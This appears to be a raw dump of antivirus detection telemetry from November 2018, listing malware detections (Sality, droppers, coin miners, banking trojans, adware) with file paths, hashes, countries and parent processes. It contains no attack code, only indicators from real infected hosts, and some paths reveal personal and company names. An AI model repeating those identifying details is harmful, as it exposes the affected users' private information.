  Row(detection=Row(filename='avscan-20181101-103357-0e67f9f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_27d3c769\\AVSCAN-20181101-103330-0B109C9C\\AVSCAN-20181101-103357-0E67F9F5', filesize=256000, name='TR/Qadars.AH.#M1.#R1'), hash='93ba4756d49ef347b1c8bbbcca894c11f724890e65ce09e3cc5ba61f90336a9f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='stage da fare.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\stage da fare.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:26:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pureset.exe', filepath='C:\\Program Files\\Pure Codec\\Codecs\\PureSet.exe', filesize=384000, name='W32/Sality.AT.#M1.#R1'), hash='b84666be3d52db8bda3cb3ecce95becbb4620ccc0644a852889a04a1f54204db', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:32:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='5a259ebfd12973b72df0405c560bf2d1.smp', filepath='\\\\192.168.10.10\\SHARED\\_tools\\runtime\\scan\\tmp_1321250449\\5a259ebfd12973b72df0405c560bf2d1.smp', filesize=1088000, name='TR/Dropper.Gen.#M300.#R3997'), hash='f29f3c5586c110a0a0feb239730b5c9d86533be52b4577da64dafca8c3739f62', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\tools\\http_server\\http_server.exe', parentsize=6242816, timestamp='2018-11-01T19:47:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-134444-d458034c', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-134413-6E913F09\\AVSCAN-20181101-134444-D458034C', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:44:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094210-e46b97e1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094210-E46B97E1', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:42:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='st6unst.exe', filepath='D:\\MAIN CROFIL DOCS SERVER 2010\\BACK UP\\NENITA GARCIA FILES\\SSS-DIFF. COMPANY\\NELTEX SSS\\SSS2010\\NELTEX  MARCH. 2010\\ST6UNST.EXE', filesize=2240000, name='W32/Sality.AT.#M1.#R1'), hash='dd32c9c095c487da2946c2238585da4a5b9b76438a30342684dafc6743e77e60', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:46:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-210036-1807c22f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b4863973\\AVSCAN-20181101-195810-E274B34F\\AVSCAN-20181101-210036-1807C22F', filesize=1536000, name='TR/CoinMiner.FS.#M1.#R1'), hash='ceb88ee9dae99f8cbaf2fb4eb6956a2783af3ee8e8bd19e3f74cfa7cf1891546', metadata=Row(cmdline=None, country='UY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:00:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='instmsiw.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\administration\\AFW\\afwv73\\Aspen Framework\\instmsiw.exe', filesize=1856000, name='W32/Small.L.#M1.#R1'), hash='931be25e2088d968b714c587ff245486b4eade3d6df13be9cfc113cdf72ad7fc', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:24:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093923-c461fbd1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093923-C461FBD1', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:39:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='videos.pif', filepath='C:\\Users\\X\\Videos\\Videos.pif', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:39:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235653-ffce6b55', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13e463c9\\AVSCAN-20181101-233541-30FB1C20\\AVSCAN-20181101-235653-FFCE6B55', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:53:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='aa13c3c41c4a718e4b0c4da457094f6a51caf4689210aafa551e98bfe2f13b14', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T08:18:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-191924-6551f516', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d17cd884\\AVSCAN-20181101-191331-2ECEAC7B\\AVSCAN-20181101-191924-6551F516', filesize=192000, name='Adware/AddLyrics.192000.14.#M1.#R1'), hash='e02c07e4a4366c426990e0ea7e32576860c092ba99c1a629f1c5512efc43dc5a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:19:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\4mui3oqb02y\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1540912029.5bd8739d3b7a5', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Emtak\\214531731.exe', parentsize=670720, timestamp='2018-11-01T00:21:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\n0urqtbpcdp\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:53:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avverbi preposizioni.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\ITALIANO\\esercitazioni\\AVVERBI PREPOSIZIONI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:25:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autocad 2013 64-bit.exe', filepath='F:\\AutoCAD 2013 64-BIT.exe', filesize=384000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:39:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\bltpkoe4av5\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1539843432.5bc825683a740', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AZ\\499287.exe', parentsize=671232, timestamp='2018-11-01T13:13:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ba302f8da3f8ecca4165eb2870ea815c88cceba52caa4f833b7d402a40899d6d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\BA302F8DA3F8ECCA4165EB2870EA815C88CCEBA52CAA4F833B7D402A40899D6D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ba302f8da3f8ecca4165eb2870ea815c88cceba52caa4f833b7d402a40899d6d', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:29:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fineprint pro v910 crack license key free download.exe', filepath='C:\\Users\\X\\Downloads\\Compressed\\FinePrint Pro v910 Crack License Key Free Download.exe', filesize=2368000, name='HEUR/AGEN.1006920.#M1.#R1'), hash='afd1f9dbfef929da58b4418c554b0344f7d785cae5c78aba78753eb7ce485dfb', metadata=Row(cmdline='\\\\\\/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T20:14:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='metodo.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\MATERIALE DIDATTICO\\METODO DI STUDIO\\metodo.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:30:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-230200-3fb06d06', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-224749-D7F124B9\\AVSCAN-20181104-230200-3FB06D06', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T16:01:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T15:47:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-17-10-39.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T21:20:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-230208-40c00e18', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-224749-D7F124B9\\AVSCAN-20181104-230208-40C00E18', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T16:02:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dsp3.exe', filepath='F:\\大戰略 PERFECT 3.0\\破解檔\\DSP3.EXE', filesize=2048000, name='W32/Almanahe.C.#M1.#R1'), hash='7a538353346d1a0bca614a50c14e009fddf625772e54ea6a1fbe171df460074c', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:M2lv44Lh9kuhRVWb.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T19:39:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:30:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131309-1fddd92e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-131309-1FDDD92E', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:13:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-121852-5a178544', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1d488594\\AVSCAN-20181104-121836-57B57202\\AVSCAN-20181104-121852-5A178544', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:18:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-110213-222b3129', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b31b56d8\\AVSCAN-20181104-110128-1C587EBB\\AVSCAN-20181104-110213-222B3129', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:02:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='riched32.dll', filepath='\\\\?\\C:\\WINDOWS\\SysWOW64\\Ipmi\\S-1-4-73\\Riched32.dll', filesize=256000, name='TR/AD.CoinLoader.B.#M1.#R1'), hash='4af82a3625f018fb014888948f76a681bbfe1b2bb6624b2002f06142f0712333', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T17:58:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-093422-324ea068', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d29325e0\\AVSCAN-20181104-091928-B5729AAE\\AVSCAN-20181104-093422-324EA068', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T01:36:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140217-ecd70e98', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140217-ECD70E98', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\Neuer Ordner (2)\\nhm_windows_1.9.1.0\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T12:19:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-180940-49d16c71', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0bc51104\\AVSCAN-20181104-165011-9512470A\\AVSCAN-20181104-180940-49D16C71', filesize=128000, name='Adware/ELEX.nynzi.#M1.#R1'), hash='3dfb3bcd7618c2bc34a4b30c7062e1d0204afe188d4c326613667d5c1ce30a25', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T12:09:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\\\\\/UPDATE_WSC=\\\\\\"ENABLE\\\\\\" \\\\\\/VDFDATE=\\\\\\"2018-10-27T00:00:00\\\\\\" \\\\\\/TRIGGER=\\\\\\"gpavgio.dll\\\\\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', parentsize=840000, timestamp='2018-11-04T02:01:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp5484751\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:42:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210208-f266322e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e86424cc\\AVSCAN-20181104-210156-F05E6771\\AVSCAN-20181104-210208-F266322E', filesize=1024000, name='Adware/CsdiMonetize.ajkoe.#M1.#R1'), hash='27ed231f47ab2f749185418f33ea7c237230d8c3a1b98ccdbcd1d008af125c21', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:02:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-040016-87b640e5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3d120d1e\\AVSCAN-20181104-035443-68BDCDA9\\AVSCAN-20181104-040016-87B640E5', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='218d43a988ba8d2f2f4e8d647390d610a1ef92363ead13e72196fc3624d5fa9e', metadata=Row(cmdline=None, country='NO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:00:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='зажим кс го.exe', filepath='C:\\Users\\X\\Downloads\\Зажим кс го.exe', filesize=640000, name='TR/Dropper.MSIL.Gen.#M300.#R5115'), hash='0ba087998ad82402890b695675cac24a658ef77763b4f18b53501489cd0aae99', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe', parentsize=2552312, timestamp='2018-11-04T17:01:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-04T23:58:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe717_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe717 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T18:23:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='spideypc.exe', filepath='g:\\لعب\\اسبيدر مان\\SpideyPC.exe', filesize=1536000, name='TR/Patched.Gen.#M300.#R3367'), hash='2ced476ec841de7721e2db7711bb920c787a52f58a9a481c8e6499d1850de6c2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:42:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='d3dx9.dll', filepath='C:\\Users\\X\\AppData\\Roaming\\.minecraft\\versions\\1.7.10 Vape\\d3dx9.dll', filesize=2048000, name='TR/Agent.qhhxz.#M1.#R1'), hash='6e4de412fb1dbf07c9133c38f9329dab3a1c3e68df9284693ff33064794cad97', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3709256, timestamp='2018-11-04T15:38:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='blocada_kh_v15.exe', filepath='C:\\Users\\X\\Downloads\\Blocada_KH_v15.exe', filesize=9344000, name='TR/Spy.Banker.Gen4.#M300.#R100338'), hash='9cd534d450db8b6b053240cd6d16cb3e3daefd32527d50b8f6ec0866934397c6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=33088, timestamp='2018-11-04T05:52:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-010752-438e9269', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_abacec2e\\AVSCAN-20181105-010551-2D0A8DFE\\AVSCAN-20181105-010752-438E9269', filesize=24840000, name='TR/Taranis.1662.#M1.#R1'), hash='1eec522942503eb911c7495b4a63203df7cc7441c6a19dba270f5485619a81a6', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:07:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210034-5d1ce4b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eb77e4c9\\AVSCAN-20181104-210000-5960DD46\\AVSCAN-20181104-210034-5D1CE4B3', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:00:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0345338.exe', filepath='F:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP438\\A0345338.exe', filesize=116000, name='W32/Sality.AT.#M1.#R1'), hash='72dcbd7bd6f78b03de185bb2f15b97906220b52ed8e7c1ebc87a1fe08da0b0b9', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T10:40:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dealplylivehandler.exe', filepath='\\\\?\\C:\\Windows.old.000\\Program Files\\DealPlyLive\\Update\\1.3.23.0\\DealPlyLiveHandler.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:12:03Z'), dt=datetime.date(2018, 11, 4)),
